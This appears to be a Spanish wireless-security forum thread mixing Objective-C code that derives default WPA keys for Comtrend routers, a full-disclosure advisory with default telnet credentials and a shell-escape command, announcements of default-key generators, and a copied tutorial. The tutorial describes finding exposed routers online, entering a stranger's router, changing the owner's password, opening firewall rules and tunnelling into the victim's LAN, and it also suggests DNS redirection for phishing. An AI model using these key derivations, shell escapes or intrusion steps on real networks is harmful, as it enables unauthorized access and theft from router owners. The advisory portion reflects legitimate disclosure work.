* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/

#import <CommonCrypto/CommonDigest.h>
#import "KeyCalculator.h"


@implementation KeyCalculator

+ (NSString *) md5:(NSString *)str {
const char *cStr = [str UTF8String];
unsigned char result[16];
CC_MD5( cStr, strlen(cStr), result );
return [NSString stringWithFormat:
@"%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X",
result[0], result[1], result[2], result[3],
result[4], result[5], result[6], result[7],
result[8], result[9], result[10], result[11],
result[12], result[13], result[14], result[15]
];
}

+(NSString*) calculateKeyWithESSID:(NSString*) essid BSSID:(NSString*) bssid {
NSString *trimmedBSSID = [bssid stringByReplacingOccurrencesOfString:@":" withString:@""];
NSString *formattedESSID = nil;
// Removing name from the ESSID, we only want the numbers
if ([essid rangeOfString:@"JAZZTEL_"].location != NSNotFound) {
formattedESSID = [[essid stringByReplacingOccurrencesOfString:@"JAZZTEL_" withString:@""] uppercaseString];
}else if ([essid rangeOfString:@"WLAN_"].location != NSNotFound) {
formattedESSID = [[essid stringByReplacingOccurrencesOfString:@"WLAN_" withString:@""] uppercaseString];
}
if (formattedESSID == nil) {
return nil;
}
// Key calculation
NSRange rng = {0,8};
NSString *stringToHash = [NSString stringWithFormat:@"%@%@%@%@",@"bcgbghgg",[trimmedBSSID substringWithRange:rng],formattedESSID,trimmedBSSID];
// Hashing
NSRange resultrange = {0,20};
NSString *result = [[[self md5:stringToHash] substringWithRange:resultrange]lowercaseString];
return result;
}



@end


Un saludo

ChimoC
#58
Buenas:

By Mambostar y *dudux

http://foro.seguridadwireless.net/comunicados-y-noticias/fallo-de-seguridad-en-routers-comtrend-full-disclosure/

=======================================
FULL DISCLOSURE - Seguridadwireless.net
Fecha descubrimiento: 24/11/2010
Ultima revisión: 08/03/2011
Descubridor: Seguridadwireless.net
=======================================

http://www.seguridadwireless.net

FALLO DE SEGURIDAD EN ROUTERS COMTREND

El patrón para generar la clave WPA-PSK por defecto de los routers COMTREND se encuentra "a la vista" en el sistema de archivos.

1.- Introducción

De todos es conocido que el cifrado WEP como protección para redes wireless es totalmente inseguro y por ello tanto fabricantes como ISP han empezado a configurar en sus dispositivos cifrados más robustos como WPA/WPA2 en sus diferentes variantes.

No obstante la utilización de claves por defecto generadas durante el proceso de fabricación, instalación y configuración hacen a estos dispositivos especialmente vulnerables una vez que se ha averiguado el patrón o el algoritmo con el que son generadas las citadas claves y más si este patrón o algoritmo es usado de manera masiva por el fabricante en diferentes modelos de routers que a su vez son distribuidos por diferentes ISP a usuarios finales.

2.- Descripción del fallo de seguridad

El fallo de seguridad es ocasionado por la incorrecta limpieza de los archivos creados durante la generación de la clave WPA-PSK y que hacen que estos archivos, en principio archivos temporales a eliminar una vez creada la clave, permanezcan en el sistema de archivos del router.

3.- Modelos afectados

Confirmada la existencia de los archivos no eliminados que permiten averiguar el patrón en el modelo de COMTREND CT-5365

Confirmada la utilización del mismo patrón para el modelo de COMTREND AR5381U,

Posiblemente también haya otros modelos afectados.

4.- How to...

Abrir una consola de linea de comandos y hacer un telnet a la IP del router, por defecto 192.168.1.1 y con user/pass 1234/1234.

Veremos por el prompt (>) que estamos en un entorno limitado y con "help" comprobamos que solo tenemos unos pocos comandos a nuestro alcance. Es facil escapar a este entorno limitado concatenando comandos (sysinfo && sh). Una vez ejecutado el comando anterior el prompt cambia a (#) y ya tenemos una consola con privilegios de root "real".

Comprobamos que los comandos "ls" y "cd" no funcionan ya que han sido eliminados del sistema de archivos por el fabricante, para poder listar el sistema de archivos y sus diferentes directorios vamos a utilizar un ls casero mediante la siguiente sentencia "for l in /*; do echo $l; done".

Una vez listado el directorio /var con "for l in /var/*; do echo $l; done" veremos dos archivos que llaman poderosamente la atención, /var/md5encode y /var/md5result.

Con un cat /var/md5encode obtenemos el patrón utilizado por el fabricante (bcgbghgg+mac+bssid) para generar un hash md5.

Con cat /var/md5result vemos y confirmamos que es el hash md5 del patrón anterior y cuyos 20 primeros caracteres son utilizados como clave WPA-PSK por defecto.


5.- Solución

Cambiar la clave WPA-PSK "de fábrica" por una propia.

6.- TimeLine

* 24/11/2010 - Se detecta el fallo en los routers CT-5365 de Telefónica (Movistar)
* 25/11/2010 - Se comprueba el mismo fallo en los routers de Jazztel
* 26/11/2010 - Se confirma la existencia del mismo patrón de generación de la clave WPA-PSK en ambos Operadores.
* 01/12/2010 - Se contacta con el fabricante Comtrend y se le informa del fallo.
* 08/12/2010 - Sin respuesta del fabricante, se envía de nuevo el correo.
* 15/12/2010 - Sin respuesta del fabricante, se emite aviso de seguridad.
* 15/12/2010 - Contacto con el fabricante.
* 07/01/2001 - Reunión y firma de NDA con el fabricante.
* 22/01/2011 - Se publica un comunicado oficial sobre el fallo de seguridad.
* 26/01/2011 - Otras personas ajenas a SW descubren el fallo pero no lo hacen público de momento.
* 26/01/2011 - Contacto con el representante de Comtrend donde reafirmamos nuestra postura sobre lo acordado.
* 04/02/2011 - Una fuente anónima publica el código donde se puede ver el patrón para descubrir la clave WPA.
* 04/02/2011 - Comunicado oficial de SW sobre la publicación del algoritmo de generación de claves WPA por parte de la fuente anónima.
* 09/02/2011 - Nuevo Comunicado oficial ampliando detalles sobre el proceso seguido hasta ahora.
* 08/03/2011 - Expira el NDA firmado con el fabricante, FULL DISCLOSURE.

7.- Agradecimientos

A hitz del foro de adslayuda por su "ls casero" en su ya antiguo post:
http://www.adslayuda.com/foro/routers-adsl/comtrend-511-535-536-561-562/accesso-ssh-al-ct-536-t89532.html#p360160

A Google, por supuesto, que nos permitió buscar lo anterior.

A todos los que confiaron en nosotros, gracias por estar ahí.


-----------------------------

FULL DISCLOSURE

Apendice

Una vez que hemos encontrado el patrón en esos archivos que no se han eliminado, veamos por donde anda ese string en el firmware.

Esto es una captura del archivo libpsi.so editado con el Bless Hex Editor



Podemos apreciar en la imagen:

- El ESSID -> WLAN_%02X%02X
- La clave WEP por defecto-> C%02X%02X%02X%02X%02X%02X formada por la inicial del fabricante (C) de comtrend en mayúscula + la mac de lan, ready for wlandecrypter.
- Como envía la salida de ifconfig para wl0 (interfaz wireless) a /var/hwaddr
- La semilla bcgbghgg
- Y en resumen como se genera la clave mandando todo a /var/md5encode y luego un md5sum con salida a /var/md5result.

Nota final

Como curiosidad BCGBGHGG es la contraseña mágica de algunos modelos de router de Comtrend para acceder al modo de depuración avanzado por consola vía RS232.

http://forums.whirlpool.net.au/archive/306047

Saludos

-------------------------------------






El post de Comtrend --> http://foro.elhacker.net/hacking_wireless/descifrar_redes_wlanxxxx_y_jazztelxxxx-t318501.0.html
#59
Buenas:

Clave por defecto WPA-PSK de las redes wireless WLAN_XXXX de los routers ZYXEL P660HW-B1A (MAC tipo 00:1f:a4:xx:xx:xx )

Esta prueba de concepto tendra fecha de caducidad

Podeis usar el siguiente formulario para realizar una recuperación de claves valida de vuestros propios equipos.
Si observa este formulario de una pagina
ajena a www.seguridadwireless.net
es una vulgar copia de la cual no podemos garantizar su validez.
Fijese bien en la ruta de su navegador.

http://www.seguridadwireless.net/wpamagickey.php

Un saludo

ChimoC
#60
Buenas:

De elmanuvolador
Creacion de Modulos .lzm (sq4) para Wifiway 2



Buenas, este tutorial es para crear módulos .lzm para wifiway de una manera más correcta de lo habitual.

Que conseguimos con este metodo?

De este modo podemos tener una lista completa de aplicaciones y librerías instaladas en /var/log/packages, además cuando se instalen actualizaciones de aplicaciones, poder desinstalar las versiones antiguas de manera sencilla así como poder desinstalar paquetes que no nos interesen de la live.

Como ejemplo vamos a actualizar grep, de la versión grep-2.5.3 que tenemos en /var/log/packages a la version grep-2.7, que es la más actual al dia de hoy.

Antes de empezar deveis descagar este modulo y cargarlo, o bien metiendolo en la carpeta wifiway/modules y reiniciar el sistema, o utilizando la opcion del menu contestual Use wifiway Module

1-Instalacion de la aplicacion:

-Primero nos descargamos grep-2.7.tar.gz y lo colocamos en el directorio /root

-una vez tengamos grep-2.7.tar.gz en root, abrimos una shell y lo descomprimimos:

tar xzf /root/grep-2.7.tar.gz

-una vez descomprimido entramos en el directorio grep-2.7:

cd grep-2.7

-creamos un nuevo directorio en grep-2.7 que lo llamaremos BUILD:

mkdir BUILD

-ahora copilamos:

./configure
make


-seguidamente creamos la estructura de archivos pero en el directorio BUILD:

make install DESTDIR=/root/grep-2.7/BUILD

NOTA: esto es solo un ejemplo ya que no todas las aplicaciones se intalan igual, depende de muchas cosas como puede ser el lenguage de programacion. Para cambiar la ruta de instalacion con python, seria algo asi:

python setup.py --root=/root/grep-2.7/BUILD

Lo importante es tener en un directorio toda la estructura de archivos de la aplicacion, cada uno que lo haga a su manera

2-Crear el paquete .tgz:

-ahora ya tenemos los archivos necesarios para crear el paqute .tgz, así que entramos en BUILD:

cd BUILD

-Abrimos una shell en BUILD (f4) y creamos el paquete .tgz en root:

makepkg /root/grep-2.7.tgz

3-Pasar un paquete .tgz a modulo .lzm:

-bueno ya tenemos nuestro paquetito .tgz, pero ahora queremos pasarlo a .lzm para que sea compatible con wifiway

-Abrimos una shell (f4) y ejecutamos el siguiente comando:

tgz2lzm /root/grep-2.7.tgz /root/grep-2.7.lzm

-Así conseguimos un .lzm con el nombre del paquete instalado en /var/log/packages

4-Eliminacion de un paquete .tgz:

-seguidamente pasamos a desinstalar el paquete antiguo grep-2.5.3-i486-5.

-Buscamos donde se encuentra este paquete en los módulos de wifiway, lo podéis mira rápidamente en /mnt/live/memory/images/ , en este caso grep-2.5.3-i486-5 se encuentra en 1.001-core.lzm

-descomprimimos el modulo 1.001-core.lzm en root y seguidamente desinstalamos el paquete con este comando:

ROOT=/root/1.001-core removepkg grep-2.5.3-i486-5

Ahora ya se puede volver a comprimir el 1.001-core.lzm sin el grep-2.5.3 o bien podemos meter los archivo del nuevo grep-2.7 en 1.001-core y después comprimirlo todo junto.

NOTA: El paso 4 no es necesario si lo que queremos es hacer un modulo independiente, esta puesto mas bien a nivel informativo por si quereis modificar cosas en vuestra live.

Esto es todo amigos, Saludos.

elmanuvolador



EDITADO: Gracias cotiess...... ;) ;) ;)
#61
Hacking Mobile / ono4xx free pal android
15 Diciembre 2010, 00:38 AM
Buenas:

Creo que os puede interesar

https://foro.elhacker.net/hacking_wireless/ono4xx_free_pal_android-t313948.0.html

De buckynet

Cita de: buckynet en 14 Diciembre 2010, 17:49 PM
Muy guenas a tod@s !!

Se encuentras subido al market la aplicacion Ono4xx Free, gratuita pal android.  ;D

Generador de diccionario de claves WEP y WPA por defecto para redes 'ONOXXXX' con BSSID inicial '00:01:38' del proveedor de servicios de Internet ONO. Introducir los 4 caracteres del ESSID, junto con los 6 últimos caracteres del BSSID y el tipo de cifrado WEP o WPA.

En esta primera versión es necesario la conexión a internet para que salga el ads, y una vez pulsado el ads, se genera el diccionario en la raíz de la scard con nombre 'Dic_ONOXXXX_WEP.txt' o 'Dic_ONOXXXX_WPA.txt' según el tipo de cifrado elegido, y mientras podéis leer la publi. ;D

En caso de producirse un error en la aplicación, es muy posible que este generando el diccionario y tan solo tendréis que esperar un poco. También existe el error en el manejo de la SD, acordaros que es necesario escribir en la SD el diccionario generado.

El diccionario generado con las 8.000 claves por nombre de ESSID y por tipo de cifrado ocupan 211 kb para WEP y 117 kb para WPA, y se van añadiendo a las claves del diccionario si volvéis a generar con el mismo ESSID y tipo de cifrado.

Se utiliza la versión 1.6 con api 4.

Os pongo unas fotos de la aplicación.





Esta disponible en el market, podeis verlo en los siguientes enlaces.

http://www.androlib.com/android.application.com-buckynet-ono-ono4xxfree-qEFnE.aspx

http://www.androidzoom.com/android_applications/tools/ono4xx-free-wep-wpa-keygen_pbcg.html

Codigo QR.



Un saludo.

PD: Como siempre, en algo, habre metido la pata.
#62
ono4xx 0.0.2a (23.09.2010) <www.seguridadwireless.net>

Development:  Mambostar - NirozMe|on

ESSID: ONOXXXX
BSSID: 00:01:38:XX:XX:XX

Descarga: http://www.seguridadwireless.net/archivos/ono4xx-0.0.2a.tar.gz

MD5: DD861F4F7E0517B74D3890C59667B85B



ono4xx calcula las posibles claves (WEP/WPA) por defecto para redes ONOxxxx (xxxx numero de 0 a 9) y routers 00:01:38:XX:XX:XX


Aviso legal
CitarEl uso de nuestro software de análisis wireless debe ser una herramienta básica para profesionales y particulares que ansían conocer el nivel de seguridad de sus instalaciones inalámbricas, queda totalmente prohibido el uso de la misma para cometer actos delictivos de intrusión sobre las redes wireless de las cuales no somos propietarios o no tenemos los permisos pertinentes para analizar su nivel de seguridad. Es vuestra responsabilidad mantener la idea principal por la que se creo seguridad wireless y todo su entorno.

No se da soporte a intrusión a redes ajenas o sobre las que no se tenga autorización para establecer su auditoria de seguridad.

Seguridadwireless no se hace responsable del mal uso de estas herramientas.

Nota: jamás nos cansaremos de decirlo, siempre, se deben modificar los patrones por defecto de nuestras instalación, es decir hablando claro, las claves que vienen por defecto

Todo este problema se solucionaría con una clave aleatoria en el montaje final del equipo

NO nos responsabilizamos del uso indebido de este software ni da soporte a la intrusión en redes ajenas o sobre las que no se tenga autorización

Este tipo de herramientas son extremadamente útiles para recuperar la clave en caso de pérdida/olvido, previo paso de haber reseteado el equipo, puesto que supone ya hemos modificado la clave por defecto.
Si eres usuario de este tipo de redes wireless en las condiciones objeto del estudio, cámbiate a WPA2-AES ya mismo.

#63
De la página hermana


ono4xx 0.0.2a (23.09.2010) <www.seguridadwireless.net>

Development:  Mambostar - NirozMe|on

ESSID: ONOXXXX
BSSID: 00:01:38:XX:XX:XX

Descarga: http://www.seguridadwireless.net/archivos/ono4xx-0.0.2a-win32.zip

MD5: 3AC7B8DE6E3F78109A20F200F8675EB8



ono4xx calcula las posibles claves (WEP/WPA) por defecto para redes ONOxxxx (xxxx numero de 0 a 9) y routers 00:01:38:XX:XX:XX


Aviso legal
CitarEl uso de nuestro software de análisis wireless debe ser una herramienta básica para profesionales y particulares que ansían conocer el nivel de seguridad de sus instalaciones inalámbricas, queda totalmente prohibido el uso de la misma para cometer actos delictivos de intrusión sobre las redes wireless de las cuales no somos propietarios o no tenemos los permisos pertinentes para analizar su nivel de seguridad. Es vuestra responsabilidad mantener la idea principal por la que se creo seguridad wireless y todo su entorno.

No se da soporte a intrusión a redes ajenas o sobre las que no se tenga autorización para establecer su auditoria de seguridad.

Seguridadwireless no se hace responsable del mal uso de estas herramientas.

Nota: jamás nos cansaremos de decirlo, siempre, se deben modificar los patrones por defecto de nuestras instalación, es decir hablando claro, las claves que vienen por defecto

Todo este problema se solucionaría con una clave aleatoria en el montaje final del equipo

NO nos responsabilizamos del uso indebido de este software ni da soporte a la intrusión en redes ajenas o sobre las que no se tenga autorización

Este tipo de herramientas son extremadamente útiles para recuperar la clave en caso de pérdida/olvido, previo paso de haber reseteado el equipo, puesto que supone ya hemos modificado la clave por defecto.
Si eres usuario de este tipo de redes wireless en las condiciones objeto del estudio, cámbiate a WPA2-AES ya mismo.







[/center
#64
De la página hermana

wlan4xx 0.2.0 (14.11.2010) <www.seguridadwireless.net>

Development:  Mambostar - NirozMe|on

ESSID: WLAN123456
BSSID: 00:11:22:33:44:55

Descarga: http://www.seguridadwireless.net/archivos/wlan4xx-0.2.0-win32.zip

MD5: AF7BEF6A6716D0899A7F918CA542243A


wlan4xx calcula las posibles claves (WEP/WPA) por defecto para redes WLANXXXXXX, WIFIXXXXXX y YACOMXXXXXX


Aviso legal
CitarEl uso de nuestro software de análisis wireless debe ser una herramienta básica para profesionales y particulares que ansían conocer el nivel de seguridad de sus instalaciones inalámbricas, queda totalmente prohibido el uso de la misma para cometer actos delictivos de intrusión sobre las redes wireless de las cuales no somos propietarios o no tenemos los permisos pertinentes para analizar su nivel de seguridad. Es vuestra responsabilidad mantener la idea principal por la que se creo seguridad wireless y todo su entorno.

No se da soporte a intrusión a redes ajenas o sobre las que no se tenga autorización para establecer su auditoria de seguridad.

Seguridadwireless no se hace responsable del mal uso de estas herramientas.

Nota: jamás nos cansaremos de decirlo, siempre, se deben modificar los patrones por defecto de nuestras instalación, es decir hablando claro, las claves que vienen por defecto

Todo este problema se solucionaría con una clave aleatoria en el montaje final del equipo

NO nos responsabilizamos del uso indebido de este software ni da soporte a la intrusión en redes ajenas o sobre las que no se tenga autorización

Este tipo de herramientas son extremadamente útiles para recuperar la clave en caso de pérdida/olvido, previo paso de haber reseteado el equipo, puesto que supone ya hemos modificado la clave por defecto.
Si eres usuario de este tipo de redes wireless en las condiciones objeto del estudio, cámbiate a WPA2-AES ya mismo



Debo hacer este aviso a navegantes: Si bajas la utilidad wlan4xx de cualquier otro sitio (megaupload, etc) distinto al enlace de la página oficial, puedes estar corriendo un riesgo innecesario.


Antiguo post --> http://foro.elhacker.net/wireless_en_windows/wla4xx_generador_por_defecto_para_router_de_yacom_wlanxxxxxx_yacomxxxxxx-t303924.0.html
#65
Buenas:

Os pongo un copy paste de un excelente trabajo de Vic_Thor  ;)

PARTE I


Y tras el router... Qué?

Bueno... esto no es que sea del todo muy, bueno... ya me entendéis.

En este hilo preguntaba nuestro compañero jochy  "Cómo atacar desde el router" http://www.wadalbertia.org/foro/viewtopic.php?f=4&t=5993

Bueno, pues la gente responde que si Upnp, que si hacer nat, que si meter un host a la DMZ, etc, etc...

Todas ellas son válidas, por supuesto, pero vamos a dar un par de pasos mas.

El primero, por qué no redirigir el DNS???

Pues claro!!! Si ya tenemos acceso al router podemos enviar las peticiones de los legítimos clientes de la LAN a un DNS bajo control del atacante, luego éste puede responder con las resoluciones que mas interese... con lo cual eso del pharming, phising, etc, está servido.

De hecho, se pueden hacer auténticas "diabluras" y con poco "esfuerzo" por parte del atacante. Si el "atacante" además de simplemente sustituir la resolución de nombres por las falsificadas está un poco espabilado, puede juguetear con proxys inversos de tal forma, que además de soplarle las contraseñas de autenticación tipo Facebook, foros, etc... no tiene ni porque "falsear" la web auténtica.. ni hacer complicadas páginas que "parezcan" iguales a las originales, sencillamente puede hacer pasar por su máquina todo lo que se le antoje.

Interesante, no?? Pues eso para otro post, que en este toca otra cosa...

En el hilo que anteriormente mencionaba, el de jochy, respondí algo así:

Citar"Si tienes acceso al router (a su configuración) y si es un router "majo" puedes hasta crear un túnel (incluso vpn) con otro router de internet... puedes hacer pasar TODO el tráfico de esa lan por tu ordenador (tu sabrás lo que haces luego con eso) y/o si configuras una vpn, pues eso... que como si estuvieses sentadito en esa red.
....
...."

Esa respuesta tiene dos vertientes:

1.- Hacer pasar el tráfico de esa red por tu lan
2.- Crear un túnel y/o VPN para conectarte a esa Lan desde tu PC.

En este post tratamos sólo el caso 2 (que ya es bastante) y también dejaremos el caso 1 para otro momento.... Así que por ahora tenemos pendiente el tema de los DNS y del enrutamiento hacia la máquina del atacante que podríamos llamarlo algo así como "esnifar desde Internet"

Como todo en la vida lo que vamos a realizar requiere de algunos conocimientos (pocos) para por lo menos saber lo que estamos haciendo y también de las herramientas necesarias.

Para "manipular" el router remoto y acceder a la lan que protege necesitamos:

a.- Acceder al router como administrador
b.- Que el router permita la creación de túneles y/o VPN
c.- Que el atacante disponga de un router que permita lo mismo y/o usar clientes de conexión VPN

Lo mas sencillo sería que el atacante utilice un router idéntico al de la víctima, por supuestísismo que esto no es obligatorio, pero simplifica las cosas si queremos crear (por ejemplo) un túnel sitio-a-sitio (obviamente el atacante ya se asegurará de bloquear las conexiones que inicien los clientes-víctima hacia su propia LAN y permitir sólo las que inicie él)

Lamentablemente Internet está lleno de routers expuestos a este tipo de ataques... principalmente porque los colocan así como vienen de fábrica y no se preocupan o no saben ni cambiar el pass de acceso, por ello hay que ser "legales" y tomar este documento como un estudio y no como un arma.

Por ejemplo, supongamos que tenemos un router BT Voyager, SAR110-130, etc..., NetGear DM600, DLink RTA o cualquiera de esos GlobeSpanVirata o Viking.

Buscar "indefensos" propietarios de esos routers en Internet es juego de niños, basta con ir a Google, buscar en foros,  blogs, etc... y los encontramos sin mas.

Veamos un ejemplo... Supongamos que queremos encontrar uno de ellos,  (como "novedad" lo vamos a ver en un vídeo)

http://free.7host05.com/verolulu/vpnswf/Buscador1.swf

Como ves, acabamos de encontrar (Google lo encontró) unas cuantas entradas...

Escogí la segunda esa que pone login, en ella vemos una ip, así que vamos  escanear el rango de ip's que nos mostraba Google.

Para ello podemos usar cualquier escáner, yo escogí superscan  que es muy rápido y sólo los puertos 80, 23 y 8080... tras unos pocos intentos... lo encontramos:

http://free.7host05.com/verolulu/vpnswf/Superscan.swf

En el vídeo vemos que se trata de un router GS8100, por lo que vamos a necesitar ls documentación del mismo para poder crear el túnel.

Este tipo de Routers basados en GlobeSpanVirata no permiten la configuración de túneles y vpn por el interface web, toca hacerlo por línea de comandos.

Así que buscamos la documentación:

http://free.7host05.com/verolulu/vpnswf/Buscador2.swf

Vale, ya tenemos el manual y todo...

Para crear un tunel L2TP entre ese router y el nuestro tendríamos que poner algo así:

$create l2tp tunnel config ifname l2t-0 localip 190.42.42.236 remoteip 88.6.15.2 localhostname RASCA remotehostname PICA start initiator remote

donde localip es la direccion ip de "la víctima" y remoteip es la direccion ip del atacante.

Obviamente el atacante, debería también configurar su router "dando la vuelta" a los parámetros...

$create l2tp tunnel config ifname l2t-0 localip 88.6.15.2 remoteip 190.42.42.236 localhostname PICA remotehostname RASCA start initiator local

El video:

http://free.7host05.com/verolulu/vpnswf/create.swf

Desgraciada o afortunadamente ese modelo de router no cuenta con el firmware actualizado para implementar túneles y/o VPN, hombre... ya puestos podríamos actualizarle el software al router (cosa que no voy a hacer) pero podría ser así:

http://free.7host05.com/verolulu/vpnswf/Upgrade1.swf

No le actualicé el firmware (por supuesto) aunque a lo mejor le venía hasta bien, jejeje, pero entre otras cosas como tiene ip dinámica después del upgrade hay que reiniciarlo y claro, ya no será la misma Ip y habría que buscarlo de nuevo (cosa que tampoco sería gran problema, pero mejor no tocarlo)

Así que con las mismas, vamos a buscar otros routers "vulnerables" mejor con IP fija y a ser posible que no haya que actualizarles el firmware....

Para esta práctica... pues buscamos lo "fácil" que son los Zyxel de telefónica.

Digo que son los fáciles porque averiguar rangos de ip's estáticas de telefónica es una sencilla consulta en Google o en RIPE, y saber si el router lleva el firmware actualizado basta con ver en las cabeceras de la conexión http algo así como:

http/1.1 401 Unautorized.WWW-Autenticate: Basic realm="Prestige 650H/HW-33"...

En este video vemos el scan de esa red... permitidme que distorsione las mismas, son estáticas y ... bueno, por si acaso....

http://free.7host05.com/verolulu/vpnswf/Zyxel.swf

Vale, ya tenemos a nuestro "conejillo de indias", no sé quienes o quienes son, vamos a ver como está ese router, una cosa... como "no quería" que el auténtico propietario del router accediese al mismo mientras "trabajaba" pues simplemente le cambié la contraseña... luego lo dejaré todo como lo encontré.

Además, para crear la VPN va a ser necesario poner la IP o el nombre de dominio del atacante... vamos, que si acceden al router podrán ver nuestros datos... y eso no está bien.

De éste vídeo averiguaremos que:

* La dirección de la LAN que utiliza es 192.168.0.0 255.255.255.0
* La dirección IP del router interna es 192.168.0.1
* No tiene activado el Firewall
* No tiene activado ningún túnel ni VPN
* No tiene reglas internas de firewall
* No tiene reglas externas de firewall
* No hay Logs ni para VPN ni para el firewall
* NAT hacia la dirección 192.168.0.100 para escritorio remoto (puerto 3389 de TCP)

Lógicamente si no tiene el Firewall activado es normal que no disponga de reglas para el mismo y tampoco existan logs

También es lógico que al no existir VPN definidas tampoco existan reglas ni logs de acceso.

Una cosa importante!!!! Que luego volveré a recordar, cuando activemos el cortafuegos que no se nos olvide añadir reglas de permiso desde Internet hacia el router por los puertos 80 y/o 23 puesto que si no lo hacemos así, perderemos la conexión por la web o Telnet con el router...

Lo vemos, entonces...

http://free.7host05.com/verolulu/vpnswf/router1.swf

Bueno, en el siguiente video vamos a habilitar el firewall con las reglas que nos permitan conectarnos mediante un cliente VPN o un router para poder crear el túnel cliente a sitio o sitio a sitio.

También vamos a añadir las reglas necesarias para Telnet  y para el puerto 80 de http y bueno... meteremos también icmp para comprobar que está online mediante un ping.

Las reglas del firewall se pueden/deben aplicar desde la LAN a Internet y desde Internet a la LAN, la primera serán los puertos y/o protocolos que permiten a los clientes de la red salir a Internet y la segunda lo contrario, lo que se permite desde Internet a la red local.

También es importante advertir que hasta que el firewall no esté activo ninguna de las reglas se aplican, recordad activar el firewall DESPUES de añadir las reglas o perderéis la conexión.

De momento veamos el vídeo para crear las reglas internas que por defecto le vamos a dejar salir por todos los puertos y protocolos, y las reglas externas que filtramos las conexiones desde Internet únicamente a 80 y 23 de TCP mas lo del ICMP

Como vimos antes, el administrador de este router hizo nat hacia una máquina por el puerto 3389 (Escritorio remoto) pues también crearemos esa regla para que lo pueda seguir haciendo una vez apliquemos las reglas y activemos el cortafuegos.

También podríamos dejar pasar el protocolo DNS, no estaría mal... eso lo haremos luego de otra forma a lo que veremos a continuación

http://free.7host05.com/verolulu/vpnswf/router2.swf

Vale, ahora tocan las reglas de la VPN, en esta ocasión en lugar de crear una regla para cada puerto-protocolo, vamos a agruparlas TODAS en una sola, el efecto es el mismo que si definimos una por una... pero es mas corto... a ello:

http://free.7host05.com/verolulu/vpnswf/router3.swf

Según hemos visto, permitimos IPSEC, GRE, PPtP, AH e IKE, no es preciso que estén todos ellos, depende de la vpn que deseemos crear, en nuestro caso no sobrarían GRE y PPtP, pero bueno... por si acaso me/nos da por crear un túnel "versus RRAS de Windows Server" (este utiliza PPtP 1723 de TCP) o por si nos da por un Cisco con GRE... vamos que ya lo tenemos.

También habréis notado que habilité los logs para en las reglas del firewall para la VPN, esto lo hago por si acaso hay algún problema en la conexión poder ver los mensajes de error, por ejemplo problemas de autenticación, apertura del túnel, etc...

Nos faltaría activar el firewall y crear la VPN, ahora lo hacemos:

http://free.7host05.com/verolulu/vpnswf/router4.swf

Antes de configurar la VPN hay que saber la configuración del atacante, es decir, de mi equipo, router, ip's...

http://free.7host05.com/verolulu/vpnswf/Ataca1.swf

Resumiendo, configuración LOCAL del atacante:

IP: 172.28.1.48 255.255.255.0
IP Interna del Router: 172.28.1.10
IP Pública del Router: 83.60.158.126


La configuración de la Víctima:

RED: 192.168.0.0 255.255.255.0
IP interna del router: 192.168.0.1
IP Pública del router: xxx.xxx.xxx.xxx (ya sabéis por qué no la pongo...)


Esto (o parte de esto) hay que ponerlo en la configuración de la VPN, vamos...

http://free.7host05.com/verolulu/vpnswf/router5.swf

Vale, pues ya tenemos la VPN creada, ahora sólo hay que "probar"

Necesitamos un cliente VPN y configurarlo con los parámetros del servidor VPN, nos vamos a descargar uno cualquiera (el vpn client de cisco mejor no que tiene sus particularidades...) yo escogí este:

TheGreenBow vpn client, lo podemos bajar de aquí:

http://www.thegreenbow.fr/cgi-bin/thegreenbow_vpn_client.exe?EN

La instalación es como las de siempre... siguiente, siguiente, .... Y finalizar.

Eso si, es MUY IMPORTANTE que tras la instalación del cliente vpn REINICIES el equipo o no funcionará.

Ahora veamos esto, lo primero que hay que hacer es ELIMINAR toda la configuración inicial y crear la nuestra propia....

http://free.7host05.com/verolulu/vpnswf/router6.swf

Y tras eso, pues bueno... podemos escanear la red 192.168.0.0 en busca de equipos, recursos compartidos, etc...

Pues eso, que espero que haya sido "instructivo" y que lo disfrutéis... pero... hombre, no pensarás que te vas a escapar de la "carga teórica", eh!!

Recuerdo que hace años puse unos pdfs de VPN, no sé si aquí o en el extinto HxC, pero bueno, vamos a hacer un repaso rápido a la VPN de esta práctica, pero como no me lo permite el sueeeeñoooo que tengo lo haré a lo largo de la semana.
#66
Buenas:

Os pongo un copy/paste de Rayo, MadAntrax, usuarionuevo, coties

No obstante, si observais que algún link NO funciona... aqui teneis otro post en el que los compañeros están resubiéndolos --> http://foro.elhacker.net/wireless_en_linux/modulos_wifiway_2_solo_enlacesnuevos_server-t313934.0.html

AQUÍ un how to de cómo crear módulos --> http://foro.elhacker.net/wireless_en_linux/como_crear_modulos_en_wifiway_2_correctamente-t316601.0.html

-----------------


Hola, siguiendo la tradición de los módulos de Wifiway 1.0 (http://foro.elhacker.net/wireless_en_linux/modulos_wifiway_10_unicamente-t286496.0.html)

-------

Abro este Post para compartir los módulos, que tengo instalados en mi Live-USB de WifiWay-2 y compartirlos con todos.

Y además animo a todo aquel que tenga algún modulo para WifiWay-2 lo comparta con todos en este mismo Post.

Algunos módulos de squashfs (wifiway1) a squashfs4 (wifiway2).

Otros no vistos en modulo para wifiway o pedidos por alguien en algún momento.

---------------------------------------------------------------------

Modulo:

Tux commander

Descripción:

Gestor de archivos, con el podras crear carpetas, navegar por el sistema, descomprimir y un monton de cosas mas.
Echo con la versión v.0.6.70

Requisitos:

Solo ganas de investigar.

Descarga:

http://www.megaupload.com/?d=Y65X994I

Imagen:


----------------------------------------------------------------------------------------------------------------

Modulo:

El famoso

Airoscript-Mod

Descripción:

Modulo con una versión con mas opciones de airoscript modificada por elmanuvolador y pepe10000 (trabaja con los archivos dump-01.csv)

Requisitos:

Aircrack-ng v1.0 sse2 o superior (probado con aircrack-ng-1.1-r1734)

Descarga:

http://www.megaupload.com/?d=DKEKY2OJ

Imagen:


----------------------------------------------------------------------------------------------------------------


Modulo:

ettercap-NG-0.7.3

Descripción:

Es un interceptor/sniffer/registrador para LANs con switch. Soporta direcciones activas y pasivas de varios protocolos (incluso aquellos cifrados, como SSH y HTTPS). También hace posible la inyección de datos en una conexión establecida y filtrado al vuelo aun manteniendo la conexión sincronizada gracias a su poder para establecer un Ataque Man-in-the-middle(Spoofing)


Requisitos:

Ninguno. (todo esta por default en wifiway-2)

De echo lo incluye, esta desde wifiway-1, pero tenia problemas para ejecutarlo correctamente.

Ahora corre sin ningún problema

Descarga:

http://www.megaupload.com/?d=DPWRN4NV


Imagen:


----------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------


